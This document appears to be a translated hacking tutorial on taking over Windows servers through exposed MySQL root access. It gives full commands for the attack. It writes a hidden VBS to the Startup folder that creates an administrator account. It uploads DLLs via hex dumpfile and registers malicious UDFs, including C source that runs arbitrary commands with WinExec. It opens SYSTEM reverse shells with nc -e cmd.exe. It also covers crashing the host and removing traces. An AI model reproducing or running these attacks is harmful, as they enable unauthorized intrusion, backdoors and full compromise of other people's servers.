1. Connect to the other party's MySQL server: `mysql -u root -h 192.168.0.1` (mysql.exe lives in the bin directory where MySQL is installed).
2. Look at the databases on the server: `mysql> show databases;` A default MySQL installation has two databases, mysql and test; any other database you see was created by a user.
3. Enter a database: `mysql> use test;` takes us into the test database.
4. Look at the tables in the database we entered: `mysql> show tables;` By default, test contains no tables.
The following are the key parts.
5. Create a new table under the test database: `mysql> create table a (cmd text);` We now have a table named a with a single field, named cmd, of type text.
6. Insert content into the table:
```sql
mysql> insert into a values ("set wshshell=createobject(""wscript.shell"")");
mysql> insert into a values ("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");
mysql> insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup Administrators 1 /add"",0)");
```
Note that the doubled quotes, the parentheses and the trailing ",0" must all be entered exactly; these three rows are what will become a VBS script.
7. Now look at what is in table a: `mysql> select * from a;` You should see the three rows we just entered. Make sure they were typed correctly before going on to the next step.
8. Output the table as a VBS script file: `mysql> select * from a into outfile "c:\docume~1\alluse~1\「Start」Menu\Programs\Startup\a.vbs";` This writes the contents of our table into the all-users Startup group as a VBS script. On the Chinese Windows install the article targets, the Start Menu folder's localized name includes the bracket characters around "Start"; note those symbols, they are part of the path.
9. By now everyone can see the idea: MySQL's outfile is being used to write an executable file. Why VBS rather than a .bat? Because a batch file pops up a visible DOS window when it runs, whereas a VBS script can run completely hidden, with no error prompts. There should also have been a final line that deletes the script after it completes, but the Chinese directory name could not be handled, so that was dropped. All right, then find a tool to attack port 135 and make the server reboot.
See the user operation below.
Next, let's look at how to generate a binary file from a script and upload it. Take a look at this MySQL script (Mix's method):
```sql
set @a = concat('', 0x0123abc1312389...);
set @a = concat(@a, 0x4658978abc545e...);
...
create table Mix (data longblob);          -- create table Mix with a field data of type longblob
insert into Mix values ("");
update Mix set data = @a;                  -- store @a in table Mix
select data from Mix into dumpfile 'C:\Winnt\filename';   -- export the table contents as a file
```
The first two statements should look familiar: this is the trick we used during injection to bypass the quote problem, converting the statement to hex, storing it in a variable and then using the variable. Here the hex is the content of a file and is far too long for one statement, so the CONCAT function is used to keep appending the next chunk of hex to the variable @a until the whole file has accumulated in it. The remaining lines are simple and are commented above.
The script is generated; how do we upload it? First log in to the MySQL server:
```
C:\>mysql -u root -h hostip -p
mysql> use mysql;        -- enter the mysql default database first, otherwise you will not know which database your next table belongs to
mysql> \. E:\*.dll.txt   -- this is your MySQL script
```
After the above commands you will see text flash past on the screen (quickly, of course), and before long your file has been uploaded. Now to the point: which DLL file do we upload? At present I have seen two ready-made DLL files on the net: Mix.dll, written by Mix, and My_udf.dll, written by Envymask. I have used both; they are very good, but each also has a shortcoming. Let's look at how each is used. First Mix.dll: log in to MySQL and enter:
```
mysql> \. E:\mix.dll.txt
mysql> create function mixconnect returns string soname 'C:\windows\mix.dll';   -- mixconnect, registered here, is the function implemented in our DLL; we use it to execute system commands
mysql> select mixconnect('your IP', '8080');   -- fill in your reverse-connection IP and port
```
After a moment, the nc listening on port 8080 receives a shell with SYSTEM privileges, as shown in Figure 1.
This is very nice: the reverse shell can pass through some firewalls. Unfortunately the function is not written very well and can only run once. When you connect to the database a second time and run `select mixconnect('your IP', '8080');` again, the remote MySQL reports an error and the service stops.
So with Mix.dll you get only one success and no chance to try again. In addition, according to my tests, it does not seem to have any effect on the Win2003 system.
```
mysql> \. C:\my_udf.dll.txt
mysql> create function my_udfdoor returns string soname 'C:\winnt\my_udf.dll';   -- likewise, my_udfdoor is the function we register to execute system commands
mysql> select my_udfdoor('');   -- the parameter can be anything; calling it is what activates the function
```
Now, without closing this shell, open another cmd and use:
```
d:\>nc hostip 3306
4.0.*-nt x$eo~mcg
F**k
```
When you see the banner line, type "F**k"; it is the default password of my_udfdoor and cannot be changed.
After a moment you have a shell with SYSTEM privileges. Because this one hooks recv, its ability to pass through firewalls is very strong: in the situation where Mix.dll's reverse connection had failed, I got in with this one, and it really did not disappoint. Once on the system I found it had two network cards and Skynet Firewall personal edition V2.73 with only port 3306 open, which shows that My_udf.dll really can penetrate a firewall. But it also has a bug: after we connect and activate the function (that is, after running `select my_udfdoor('')`), regardless of whether you are still connected, executing
`mysql> drop function my_udfdoor;` makes MySQL report an error and hang up,
so with this DLL file you cannot remove your traces!
Finally, let's write a custom DLL file ourselves and see whether it solves these problems.
We simply use the MySQL UDF sample as a template. Look at the example:
```c
#include <stdlib.h>
#include <winsock.h>
#include <mysql.h>

extern "C" {
    /* C-compatible linkage */
    char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);
}

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    char *me = "my name";
    return me;   /* calling this UDF returns my name */
}
```
Pretty simple, isn't it? We only need to change it a little to get our own DLL file.
Here is the version modified by my buddy Crackme:
```c
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include "mysql.h"

/* sys_name is the function name; you can change it to anything you like */
extern "C" __declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);

/* of course, the sys_name here must be changed as well */
__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    char me[256] = {0};
    if (args->arg_count == 1) {
        strncpy(me, args->args[0], args->lengths[0]);
        me[args->lengths[0]] = '\0';
        WinExec(me, SW_HIDE);   /* runs whatever command was passed in */
    } else
        strcpy(me, "do NOTHING.\n");
    return me;
}
```
OK, we can compile this into Sysudf.dll. Let's experiment with it.
See the operation:
```
mysql> \. C:\sysudf.dll.txt
mysql> create function sys_name returns string soname 'C:\windows\sysudf.dll';
mysql> \. nc.exe.txt   -- upload nc.exe too
mysql> select sys_name('nc.exe -e cmd.exe my IP 8080');   -- sys_name takes a single parameter, the system command to execute
```
OK, now look at a reverse shell on Win2003.
Of course you do not have to use a reverse shell; you can execute other commands instead, but whether or not the execution succeeds there is no output, so make sure the command format is correct. With this DLL file, testing shows that `drop function sys_name` never produces an error, and you can run different commands many times. As for its shortcoming, its ability to get through a firewall is not as strong as Mix.dll's; but for a firewall that cannot be penetrated at all, running other commands directly is the best choice.